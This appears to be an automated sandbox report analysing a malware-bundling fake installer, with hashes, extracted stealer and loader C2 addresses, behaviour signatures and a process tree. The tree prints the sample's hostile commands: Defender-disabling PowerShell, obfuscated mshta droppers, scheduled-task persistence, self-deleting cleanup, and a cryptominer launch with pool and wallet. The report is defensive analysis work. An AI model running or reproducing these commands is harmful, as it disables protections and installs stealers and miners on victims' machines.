Resubmissions

01-11-2021 20:09

211101-yw5kbaafg5 10

01-11-2021 07:13

211101-h2lrdsdhhj 10

01-11-2021 06:40

211101-hfpk6adhfj 10

31-10-2021 18:27

211031-w3r7fsdafj 10

31-10-2021 14:10

211031-rgstmscghm 10

31-10-2021 08:02

211031-jxchlacefm 10

31-10-2021 06:36

211031-hczxqacddp 10

31-10-2021 06:23

211031-g5wv4affb3 10

Analysis

  • max time kernel
    3931s
  • max time network
    5378s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    31-10-2021 18:27

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.5MB

  • MD5

    3da25ccfa9c258e3ae26854391531c7b

  • SHA1

    1ed5613b0ad8ab4c47f07e52199a4edd27be40e6

  • SHA256

    62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720

  • SHA512

    defed576df3d8325259884b485a0dc7cd673c47028e77f189255e27dca312a0befdc8dc84106cc3103a3027e67a835fad899f9361076a64831db144354a4618c

Malware Config

Extracted

Family

redline

Botnet

srtupdate33

C2

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

C2

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.6

Botnet

933

C2

https://mas.to/@lilocc

Attributes
  • profile_id

    933

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 5 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • suricata: ET MALWARE FormBook CnC Checkin (POST) M2

    suricata: ET MALWARE FormBook CnC Checkin (POST) M2

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • suricata: ET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND

    suricata: ET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND

  • suricata: ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND

    suricata: ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 16 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 19 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 22 IoCs
  • Drops file in Windows directory 40 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 21 IoCs
  • Checks SCSI registry key(s) 3 TTPs 39 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers network information 2 TTPs 5 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 10 IoCs
  • Modifies Internet Explorer settings 1 TTPs 19 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Script User-Agent 5 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
    1⤵
      PID:2460
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Drops file in Program Files directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      PID:3032
      • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3932
        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1924
          • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\setup_install.exe
            "C:\Users\Admin\AppData\Local\Temp\7zS48799D95\setup_install.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:3600
            • C:\Windows\System32\Conhost.exe
              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              5⤵
                PID:1072
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3972
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1852
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3836
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1860
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3768
                • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun03d477f1a31.exe
                  Sun03d477f1a31.exe
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1720
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    7⤵
                      PID:5020
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im chrome.exe
                        8⤵
                        • Kills process with taskkill
                        PID:4884
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4084
                  • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun033e271e0ce96c08.exe
                    Sun033e271e0ce96c08.exe /mixone
                    6⤵
                    • Executes dropped EXE
                    PID:944
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 660
                      7⤵
                      • Program crash
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4152
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 676
                      7⤵
                      • Program crash
                      PID:4696
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 684
                      7⤵
                      • Program crash
                      PID:5080
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 676
                      7⤵
                      • Program crash
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4696
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 892
                      7⤵
                      • Program crash
                      PID:5468
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 940
                      7⤵
                      • Program crash
                      PID:5308
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 1104
                      7⤵
                      • Suspicious use of NtCreateProcessExOtherParentProcess
                      • Program crash
                      PID:6000
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2868
                  • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun03e4aeb7e43a1c.exe
                    Sun03e4aeb7e43a1c.exe
                    6⤵
                    • Executes dropped EXE
                    PID:3276
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2176734577.exe"
                      7⤵
                        PID:4204
                        • C:\Users\Admin\AppData\Local\Temp\2176734577.exe
                          "C:\Users\Admin\AppData\Local\Temp\2176734577.exe"
                          8⤵
                          • Executes dropped EXE
                          PID:4876
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\5225444644.exe"
                        7⤵
                          PID:4992
                          • C:\Users\Admin\AppData\Local\Temp\5225444644.exe
                            "C:\Users\Admin\AppData\Local\Temp\5225444644.exe"
                            8⤵
                            • Executes dropped EXE
                            PID:4748
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun03e4aeb7e43a1c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun03e4aeb7e43a1c.exe" & exit
                          7⤵
                          • Blocklisted process makes network request
                          • Executes dropped EXE
                          PID:5340
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im "Sun03e4aeb7e43a1c.exe" /f
                            8⤵
                            • Kills process with taskkill
                            PID:1952
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe
                      5⤵
                        PID:992
                        • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun0324aba28588c0.exe
                          Sun0324aba28588c0.exe
                          6⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          PID:2292
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe
                        5⤵
                          PID:3252
                          • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun038aa349e3318e.exe
                            Sun038aa349e3318e.exe
                            6⤵
                            • Executes dropped EXE
                            PID:2544
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe
                          5⤵
                            PID:1928
                            • C:\Users\Admin\AppData\Local\Temp\7zS48799D95\Sun03ea09aa5c9686e5.exe
                              Sun03ea09aa5c9686e5.exe
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2116
                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:4160
                                • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:4468
                                  • C:\Windows\System32\conhost.exe
                                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                    9⤵
                                      PID:4708
                                      • C:\Windows\System32\cmd.exe
                                        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                        10⤵
                                          PID:2164
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                            11⤵
                                            • Creates scheduled task(s)
                                            PID:9156
                                        • C:\Windows\System32\cmd.exe
                                          "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                          10⤵
                                            PID:7096
                                            • C:\Users\Admin\AppData\Roaming\services64.exe
                                              C:\Users\Admin\AppData\Roaming\services64.exe
                                              11⤵
                                                PID:7136
                                                • C:\Windows\System32\conhost.exe
                                                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                  12⤵
                                                  • Suspicious use of SetThreadContext
                                                  PID:5944
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                    13⤵
                                                      PID:7584
                                                      • C:\Windows\System32\conhost.exe
                                                        "C:\Windows\System32\conhost.exe" "/sihost64"
                                                        14⤵
                                                          PID:8776
                                                      • C:\Windows\explorer.exe
                                                        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                                        13⤵
                                                          PID:7604
                                              • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                8⤵
                                                  PID:4724
                                                • C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Checks processor information in registry
                                                  PID:4792
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im Soft1WW01.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe" & del C:\ProgramData\*.dll & exit
                                                    9⤵
                                                      PID:3148
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im Soft1WW01.exe /f
                                                        10⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Drops file in Program Files directory
                                                        • Kills process with taskkill
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:1340
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 6
                                                        10⤵
                                                        • Delays execution with timeout.exe
                                                        PID:5516
                                                  • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                    8⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4580
                                                    • C:\Users\Admin\AppData\Roaming\1844188.exe
                                                      "C:\Users\Admin\AppData\Roaming\1844188.exe"
                                                      9⤵
                                                      • Executes dropped EXE
                                                      PID:1044
                                                    • C:\Users\Admin\AppData\Roaming\8677677.exe
                                                      "C:\Users\Admin\AppData\Roaming\8677677.exe"
                                                      9⤵
                                                      • Executes dropped EXE
                                                      • Checks BIOS information in registry
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:5156
                                                    • C:\Users\Admin\AppData\Roaming\7364511.exe
                                                      "C:\Users\Admin\AppData\Roaming\7364511.exe"
                                                      9⤵
                                                      • Executes dropped EXE
                                                      • Checks BIOS information in registry
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:5352
                                                    • C:\Users\Admin\AppData\Roaming\1884637.exe
                                                      "C:\Users\Admin\AppData\Roaming\1884637.exe"
                                                      9⤵
                                                        PID:5500
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          "C:\Windows\System32\mshta.exe" vBscRipt: cLosE ( cReAtEOBjEct ( "WsCript.SHEll" ). run ( "CMD /Q/R tYpe ""C:\Users\Admin\AppData\Roaming\1884637.exe"" > B6O~DgUD3.exe && STaRt B6O~DGUD3.Exe -P580S5bUuKs9XuzynTIqeOihjj1miW4 &If """"== """" for %q In ( ""C:\Users\Admin\AppData\Roaming\1884637.exe"" ) do taskkill /Im ""%~Nxq"" /F " , 0 , tRUE ) )
                                                          10⤵
                                                            PID:5560
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /Q/R tYpe "C:\Users\Admin\AppData\Roaming\1884637.exe"> B6O~DgUD3.exe && STaRt B6O~DGUD3.Exe -P580S5bUuKs9XuzynTIqeOihjj1miW4 &If ""== "" for %q In ( "C:\Users\Admin\AppData\Roaming\1884637.exe" ) do taskkill /Im "%~Nxq" /F
                                                              11⤵
                                                                PID:5832
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /Im "1884637.exe" /F
                                                                  12⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1976
                                                          • C:\Users\Admin\AppData\Roaming\6835320.exe
                                                            "C:\Users\Admin\AppData\Roaming\6835320.exe"
                                                            9⤵
                                                            • Executes dropped EXE
                                                            PID:5568
                                                          • C:\Users\Admin\AppData\Roaming\2355162.exe
                                                            "C:\Users\Admin\AppData\Roaming\2355162.exe"
                                                            9⤵
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            PID:5524
                                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                              10⤵
                                                              • Executes dropped EXE
                                                              PID:5608
                                                        • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:5008
                                                        • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:4180
                                                          • C:\Windows\SysWOW64\mshta.exe
                                                            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                            9⤵
                                                              PID:4552
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                10⤵
                                                                  PID:5112
                                                                  • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                    ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                    11⤵
                                                                    • Executes dropped EXE
                                                                    PID:4232
                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                      "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                      12⤵
                                                                        PID:5344
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                          13⤵
                                                                            PID:5188
                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                          "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                          12⤵
                                                                            PID:5932
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                              13⤵
                                                                                PID:6112
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                  14⤵
                                                                                    PID:1096
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                    14⤵
                                                                                      PID:1160
                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                      msiexec -Y ..\lXQ2g.WC
                                                                                      14⤵
                                                                                      • Loads dropped DLL
                                                                                      PID:4244
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill -f -iM "search_hyperfs_206.exe"
                                                                                11⤵
                                                                                • Kills process with taskkill
                                                                                PID:5800
                                                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          PID:1972
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 792
                                                                            9⤵
                                                                            • Program crash
                                                                            PID:6112
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 804
                                                                            9⤵
                                                                            • Program crash
                                                                            PID:5592
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 808
                                                                            9⤵
                                                                            • Program crash
                                                                            PID:6056
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 768
                                                                            9⤵
                                                                            • Program crash
                                                                            PID:5664
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 920
                                                                            9⤵
                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                            • Program crash
                                                                            PID:5440
                                                                        • C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          PID:4804
                                                                        • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          PID:4856
                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                            9⤵
                                                                            • Executes dropped EXE
                                                                            PID:5124
                                                                        • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          PID:1200
                                                                          • C:\Windows\system32\WerFault.exe
                                                                            C:\Windows\system32\WerFault.exe -u -p 1200 -s 1508
                                                                            9⤵
                                                                            • Program crash
                                                                            PID:5044
                                                                        • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:3656
                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
